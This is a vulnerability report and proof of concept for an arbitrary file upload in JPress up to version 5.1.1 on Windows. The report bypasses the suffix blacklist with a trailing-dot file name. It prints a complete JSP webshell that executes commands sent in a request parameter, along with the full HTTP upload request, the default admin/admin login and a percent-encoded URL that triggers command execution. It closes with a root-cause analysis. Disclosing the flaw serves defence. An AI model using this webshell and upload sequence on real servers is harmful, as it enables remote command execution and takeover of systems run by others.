≤5.1.1
https://github.com/JPressProjects/jpress
JPress up to and including v5.1.1 has an arbitrary file upload on the Windows platform: submitting a file name in a non-standard form such as b.jsp. (with a trailing dot) bypasses the suffix blacklist, and the resulting .jsp file leads to arbitrary command execution.
After setting up the project, log in to the backend with the weak password admin/admin, then select Attachments → Root directory (附件 → 根目录) and click Upload (上传).
Prepare a webshell file b.jsp with the following code (it requires pwd=023 and runs the command given in the i parameter):
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
To upload it, rename the file from b.jsp to b.jsp. (trailing dot). This bypasses the server's suffix check and the file is written into the Tomcat root directory, where Windows stores it as b.jsp. Then visit http://127.0.0.1:8080/b.%6a%73%70?pwd=023&i=whoami (the path is b.jsp with the suffix percent-encoded; Tomcat decodes it before mapping the request). The server parses the webshell and the command whoami is executed, its output being returned in the response.
POST /admin/attachment/doUplaodRootFile?csrf_token=ff67749ed950d998b909645f051b985f HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 484
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOH6mHWg1yTaNq5YE
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://127.0.0.1:8080
Referer: http://127.0.0.1:8080/admin/attachment/root
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _jpanonym=MWEyNGExMmNlOGZjNjRiZGZkYWJlMDI4ZDY0ZDVhZjUjMTcyODU1NjczMDExNiMzMTUzNjAwMCNPVE01TmpJMVpqZGtPVFk1TkRoaFlXRmhOVGRsTVRjMVl6Wm1ZelF3TXpZPQ==; _jpuid=YmMxZTA2ODJjYjVmOGVkMDkwYWNmNjUyNjNkZjMxYjEjMTcyODU1Njc0ODk3NyMxNzI4MDAjTVE9PQ==; csrf_token=ff67749ed950d998b909645f051b985f; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1728556751; HMACCOUNT=E4C3DC92B0190419; Hm_lpvt_bfe2407e37bbaa8dc195c5db42daf96a=1728556858
Connection: close

------WebKitFormBoundaryOH6mHWg1yTaNq5YE
Content-Disposition: form-data; name="files[]"; filename="b.jsp."
Content-Type: application/octet-stream

<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
------WebKitFormBoundaryOH6mHWg1yTaNq5YE--
The vulnerability is located in io.jpress.web.admin._AttachmentController#doUplaodRootFile. At line 188 the method calls AttachmentUtils#isUnsafe, which extracts the suffix of the uploaded file name and rejects the upload if that suffix appears on a blacklist of forbidden extensions (the blacklist itself is not reproduced in this report).
Therefore, on the Windows platform we can submit a file name that does not comply with Windows naming rules, for example b.jsp. instead of b.jsp. The blacklist is matched against the suffix of the name as submitted, and b.jsp. no longer ends in .jsp, so the check passes. When the file is then written to disk, Windows silently strips the trailing dot (trailing dots and spaces are not permitted in Win32 file names), so the stored file is b.jsp. In this way the blacklist policy is bypassed and a file of any type can be uploaded. Note that Linux keeps the trailing dot as part of the name, so the same trick does not produce an executable .jsp there.